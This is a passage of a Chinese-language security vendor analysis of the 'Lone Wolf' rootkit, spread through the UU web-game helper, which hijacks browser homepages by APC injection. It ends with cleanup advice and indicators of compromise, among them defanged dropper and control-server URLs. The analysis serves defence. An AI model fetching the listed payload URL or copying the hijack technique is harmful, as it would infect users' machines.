分析发现，当前主页配置信息暂未下发，病毒暂未执行锁定用户浏览器主页的能力。推测当前病毒处于投递扩散期，保留了部分恶意行为暂不执行，当其感染量到达一定程度时，再随时下发劫持指令，实现浏览器劫持功能。 独狼Rootkit病毒可劫持数十款主流浏览器软件，包括IE、Chrome及其他国内用户常见的浏览器等等： 以插apc的方式向浏览器注入恶意代码： 我们通过对该病毒以往版本的分析，知道该病毒可以简单修改或升级配置，实现对浏览器主页的锁定功能，通常会将浏览器主页劫持到带推广id的2345广告站点。 当前病毒配置 简单构造病毒劫持配置文件desktop.ini 打开浏览器主页发现主页已被劫持到指定地址： 三、解决方案及安全建议 网上各种小众工具软件分发渠道良莠不齐，不少软件下载站暗藏玄机，很容易下载安装不需要的软件，甚至部分软件下载站还会推广危害严重的勒索软件。腾讯安全专家建议用户尽可能从相应软件的官方网站下载软件，或者通过腾讯电脑管家的软件管理功能下载需要的软件，启用腾讯电脑管家的权限雷达，帮助过滤软件包中存在的静默安装、恶意弹窗，管理开机自动运行等有损用户体验的情况发生。 腾讯电脑管家查杀UU页游助手 管家急救箱清理独狼Rootkit木马 IOCs MD5： 717d43d175430844467993ac4834396f 21a9876550dcebe12df9ec1011a01035 75f39f61ecc20a088766eb319d1ec9e2 7652ad8e2c69bef67c786eff3e9e3ef3 51991e47adb0b9160f077a0fc722f115 238b0180e66d16309efe50143b46560d 94f31a6d0d3243811705e0c9796cf060 8ec5ee614f76d0c547e2b76a52e8dae2 1374c22e5c861813c82bf6a1c8c159f9 Domain: www.jia7788.top update.uuyyzs.com URL hxxp://update.uuyyzs.com/query_action.php（UU页游助手云控地址） Hxxp://www.jia7788.top:7788/new/a109.exe（独狼病毒母体投递地址）